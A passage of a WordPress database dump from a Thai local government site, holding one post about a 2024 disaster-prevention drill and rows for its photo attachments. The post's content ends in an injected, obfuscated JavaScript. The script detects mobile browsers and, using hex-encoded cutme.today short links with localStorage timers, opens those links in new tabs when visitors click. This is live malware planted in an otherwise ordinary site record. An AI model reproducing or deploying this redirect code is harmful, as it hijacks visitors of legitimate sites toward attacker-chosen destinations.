ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โครงการซ้อมแผนปฏิบัติการป้องกันและบรรเทาสาธารณะภัย ประจำปีงบประมาณ 2567','','publish','closed','closed','','%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%8b%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%81','','','2024-08-20 12:04:16','2024-08-20 05:04:16','',0,'http://pakhaeng.ssk.in.th/?p=905',0,'post','',0),
(906,1,'2024-08-20 11:55:15','2024-08-20 04:55:15','','S__69214221_0','','inherit','','closed','','s__69214221_0','','','2024-08-20 11:55:15','2024-08-20 04:55:15','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214221_0.jpg',0,'attachment','image/jpeg',0),
(907,1,'2024-08-20 11:55:15','2024-08-20 04:55:15','','S__69214223_0','','inherit','','closed','','s__69214223_0','','','2024-08-20 11:55:15','2024-08-20 04:55:15','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214223_0.jpg',0,'attachment','image/jpeg',0),
(908,1,'2024-08-20 11:55:17','2024-08-20 04:55:17','','S__69214213_0','','inherit','','closed','','s__69214213_0','','','2024-08-20 11:55:17','2024-08-20 04:55:17','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214213_0.jpg',0,'attachment','image/jpeg',0),
(909,1,'2024-08-20 11:55:18','2024-08-20 04:55:18','','S__69214215_0','','inherit','','closed','','s__69214215_0','','','2024-08-20 11:55:18','2024-08-20 04:55:18','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214215_0.jpg',0,'attachment','image/jpeg',0),
(910,1,'2024-08-20 11:55:19','2024-08-20 04:55:19','','S__69214216_0','','inherit','','closed','','s__69214216_0','','','2024-08-20 11:55:19','2024-08-20 04:55:19','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214216_0.jpg',0,'attachment','image/jpeg',0),
(911,1,'2024-08-20 11:55:20','2024-08-20 04:55:20','','S__69214217_0','','inherit','','closed','','s__69214217_0','','','2024-08-20 11:55:20','2024-08-20 04:55:20','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214217_0.jpg',0,'attachment','image/jpeg',0),
(912,1,'2024-08-20 11:55:21','2024-08-20 04:55:21','','S__69214218_0','','inherit','','closed','','s__69214218_0','','','2024-08-20 11:55:21','2024-08-20 04:55:21','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214218_0.jpg',0,'attachment','image/jpeg',0),
(913,1,'2024-08-20 11:55:22','2024-08-20 04:55:22','','S__69214219_0','','inherit','','closed','','s__69214219_0','','','2024-08-20 11:55:22','2024-08-20 04:55:22','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214219_0.jpg',0,'attachment','image/jpeg',0),
(914,1,'2024-08-20 11:55:24','2024-08-20 04:55:24','','S__69214220_0','','inherit','','closed','','s__69214220_0','','','2024-08-20 11:55:24','2024-08-20 04:55:24','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214220_0.jpg',0,'attachment','image/jpeg',0),
(915,1,'2024-08-20 11:55:24','2024-08-20 04:55:24','','S__69214222_0','','inherit','','closed','','s__69214222_0','','','2024-08-20 11:55:24','2024-08-20 04:55:24','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214222_0.jpg',0,'attachment','image/jpeg',0),
(916,1,'2024-08-20 11:55:26','2024-08-20 04:55:26','','S__69214231_0','','inherit','','closed','','s__69214231_0','','','2024-08-20 11:55:26','2024-08-20 04:55:26','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214231_0.jpg',0,'attachment','image/jpeg',0),
(917,1,'2024-08-20 11:55:26','2024-08-20 04:55:26','','S__69214232_0','','inherit','','closed','','s__69214232_0','','','2024-08-20 11:55:26','2024-08-20 04:55:26','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214232_0.jpg',0,'attachment','image/jpeg',0),
(918,1,'2024-08-20 11:55:28','2024-08-20 04:55:28','','S__69214233_0','','inherit','','closed','','s__69214233_0','','','2024-08-20 11:55:28','2024-08-20 04:55:28','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214233_0.jpg',0,'attachment','image/jpeg',0),
(919,1,'2024-08-20 11:55:29','2024-08-20 04:55:29','','S__69214234_0','','inherit','','closed','','s__69214234_0','','','2024-08-20 11:55:29','2024-08-20 04:55:29','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214234_0.jpg',0,'attachment','image/jpeg',0),
(920,1,'2024-08-20 11:55:31','2024-08-20 04:55:31','','S__69214226_0','','inherit','','closed','','s__69214226_0','','','2024-08-20 11:55:31','2024-08-20 04:55:31','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214226_0.jpg',0,'attachment','image/jpeg',0),
(921,1,'2024-08-20 11:55:32','2024-08-20 04:55:32','','S__69214224_0','','inherit','','closed','','s__69214224_0','','','2024-08-20 11:55:32','2024-08-20 04:55:32','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214224_0.jpg',0,'attachment','image/jpeg',0),
(922,1,'2024-08-20 11:55:34','2024-08-20 04:55:34','','S__69214227_0','','inherit','','closed','','s__69214227_0','','','2024-08-20 11:55:34','2024-08-20 04:55:34','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214227_0.jpg',0,'attachment','image/jpeg',0),
(923,1,'2024-08-20 11:55:34','2024-08-20 04:55:34','','S__69214228_0','','inherit','','closed','','s__69214228_0','','','2024-08-20 11:55:34','2024-08-20 04:55:34','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214228_0.jpg',0,'attachment','image/jpeg',0),
(924,1,'2024-08-20 11:55:36','2024-08-20 04:55:36','','S__69214230_0','','inherit','','closed','','s__69214230_0','','','2024-08-20 11:55:36','2024-08-20 04:55:36','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214230_0.jpg',0,'attachment','image/jpeg',0),
(925,1,'2024-08-20 11:55:36','2024-08-20 04:55:36','','S__69214229_0','','inherit','','closed','','s__69214229_0','','','2024-08-20 11:55:36','2024-08-20 04:55:36','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214229_0.jpg',0,'attachment','image/jpeg',0),
(926,1,'2024-08-20 11:55:38','2024-08-20 04:55:38','','S__69214237_0','','inherit','','closed','','s__69214237_0','','','2024-08-20 11:55:38','2024-08-20 04:55:38','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214237_0.jpg',0,'attachment','image/jpeg',0),
(927,1,'2024-08-20 11:55:38','2024-08-20 04:55:38','','S__69214239_0','','inherit','','closed','','s__69214239_0','','','2024-08-20 11:55:38','2024-08-20 04:55:38','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214239_0.jpg',0,'attachment','image/jpeg',0),
(928,1,'2024-08-20 11:55:41','2024-08-20 04:55:41','','S__69214240_0','','inherit','','closed','','s__69214240_0','','','2024-08-20 11:55:41','2024-08-20 04:55:41','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214240_0.jpg',0,'attachment','image/jpeg',0),
(929,1,'2024-08-20 11:55:41','2024-08-20 04:55:41','','S__69214241_0','','inherit','','closed','','s__69214241_0','','','2024-08-20 11:55:41','2024-08-20 04:55:41','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214241_0.jpg',0,'attachment','image/jpeg',0),
(930,1,'2024-08-20 11:55:43','2024-08-20 04:55:43','','S__69214242_0','','inherit','','closed','','s__69214242_0','','','2024-08-20 11:55:43','2024-08-20 04:55:43','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214242_0.jpg',0,'attachment','image/jpeg',0),
(931,1,'2024-08-20 11:55:43','2024-08-20 04:55:43','','S__69214243_0','','inherit','','closed','','s__69214243_0','','','2024-08-20 11:55:43','2024-08-20 04:55:43','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214243_0.jpg',0,'attachment','image/jpeg',0),
(932,1,'2024-08-20 11:55:46','2024-08-20 04:55:46','','S__69214245_0','','inherit','','closed','','s__69214245_0','','','2024-08-20 11:55:46','2024-08-20 04:55:46','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214245_0.jpg',0,'attachment','image/jpeg',0),
(933,1,'2024-08-20 11:55:46','2024-08-20 04:55:46','','S__69214244_0','','inherit','','closed','','s__69214244_0','','','2024-08-20 11:55:46','2024-08-20 04:55:46','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214244_0.jpg',0,'attachment','image/jpeg',0),
(934,1,'2024-08-20 11:55:48','2024-08-20 04:55:48','','S__69214235_0','','inherit','','closed','','s__69214235_0','','','2024-08-20 11:55:48','2024-08-20 04:55:48','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214235_0.jpg',0,'attachment','image/jpeg',0),
(935,1,'2024-08-20 11:55:51','2024-08-20 04:55:51','','S__69214238_0','','inherit','','closed','','s__69214238_0','','','2024-08-20 11:55:51','2024-08-20 04:55:51','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214238_0.jpg',0,'attachment','image/jpeg',0),
(936,1,'2024-08-20 11:55:51','2024-08-20 04:55:51','','S__69214248_0','','inherit','','closed','','s__69214248_0','','','2024-08-20 11:55:51','2024-08-20 04:55:51','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214248_0.jpg',0,'attachment','image/jpeg',0),
(937,1,'2024-08-20 11:55:53','2024-08-20 04:55:53','','S__69214250_0','','inherit','','closed','','s__69214250_0','','','2024-08-20 11:55:53','2024-08-20 04:55:53','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214250_0.jpg',0,'attachment','image/jpeg',0),
(938,1,'2024-08-20 11:55:53','2024-08-20 04:55:53','','S__69214252_0','','inherit','','closed','','s__69214252_0','','','2024-08-20 11:55:53','2024-08-20 04:55:53','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214252_0.jpg',0,'attachment','image/jpeg',0),
(939,1,'2024-08-20 11:55:56','2024-08-20 04:55:56','','S__69214246_0','','inherit','','closed','','s__69214246_0','','','2024-08-20 11:55:56','2024-08-20 04:55:56','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214246_0.jpg',0,'attachment','image/jpeg',0),
(940,1,'2024-08-20 11:55:57','2024-08-20 04:55:57','','S__69214249_0','','inherit','','closed','','s__69214249_0','','','2024-08-20 11:55:57','2024-08-20 04:55:57','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214249_0.jpg',0,'attachment','image/jpeg',0),
(941,1,'2024-08-20 11:56:00','2024-08-20 04:56:00','','S__69214251_0','','inherit','','closed','','s__69214251_0','','','2024-08-20 11:56:00','2024-08-20 04:56:00','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214251_0.jpg',0,'attachment','image/jpeg',0),
(942,1,'2024-08-20 11:56:02','2024-08-20 04:56:02','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_21','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80%e0%b8%9e','','','2024-08-20 11:56:02','2024-08-20 04:56:02','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_21.jpg',0,'attachment','image/jpeg',0),
(943,1,'2024-08-20 11:56:05','2024-08-20 04:56:05','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_20','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80-2','','','2024-08-20 11:56:05','2024-08-20 04:56:05','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_20.jpg',0,'attachment','image/jpeg',0),
(944,1,'2024-08-20 11:56:08','2024-08-20 04:56:08','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_19','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80-3','','','2024-08-20 11:56:08','2024-08-20 04:56:08','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_19.jpg',0,'attachment','image/jpeg',0),
(945,1,'2024-08-20 11:56:12','2024-08-20 04:56:12','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_17','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80-4','','','2024-08-20 11:56:12','2024-08-20 04:56:12','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_17.jpg',0,'attachment','image/jpeg',0),
(946,1,'2024-08-20 11:56:12','2024-08-20 04:56:12','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_18','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80-5','','','2024-08-20 11:56:12','2024-08-20 04:56:12','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_18.jpg',0,'attachment','image/jpeg',0),
(947,1,'2024-08-20 11:56:18','2024-08-20 04:56:18','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_15','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80-6','','','2024-08-20 11:56:18','2024-08-20 04:56:18','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_15.jpg',0,'attachment','image/jpeg',0),
(948,1,'2024-08-20 11:56:21','2024-08-20 04:56:21','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_16','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80-7','','','2024-08-20 11:56:21','2024-08-20 04:56:21','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_16.jpg',0,'attachment','image/jpeg',0),
(949,1,'2024-08-20 11:56:22','2024-08-20 04:56:22','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_14','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80-8','','','2024-08-20 11:56:22','2024-08-20 04:56:22','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_14.jpg',0,'attachment','image/jpeg',0),
(950,1,'2024-08-20 11:56:26','2024-08-20 04:56:26','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_12','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80-9','','','2024-08-20 11:56:26','2024-08-20 04:56:26','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_12.jpg',0,'attachment','image/jpeg',0),
(951,1,'2024-08-20 11:56:28','2024-08-20 04:56:28','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_13','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80-10','','','2024-08-20 11:56:28','2024-08-20 04:56:28','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_13.jpg',0,'attachment','image/jpeg',0),
(952,1,'2024-08-20 11:56:33','2024-08-20 04:56:33','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_11','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80-11','','','2024-08-20 11:56:33','2024-08-20 04:56:33','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_11.jpg',0,'attachment','image/jpeg',0),
(953,1,'2024-08-20 11:56:36','2024-08-20 04:56:36','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_10','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80-12','','','2024-08-20 11:56:36','2024-08-20 04:56:36','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_10.jpg',0,'attachment','image/jpeg',0),
(954,1,'2024-08-20 11:56:38','2024-08-20 04:56:38','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_9','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80-13','','','2024-08-20 11:56:38','2024-08-20 04:56:38','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_9.jpg',0,'attachment','image/jpeg',0),
(955,1,'2024-08-20 11:56:42','2024-08-20 04:56:42','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_8','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80-14','','','2024-08-20 11:56:42','2024-08-20 04:56:42','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_8.jpg',0,'attachment','image/jpeg',0),
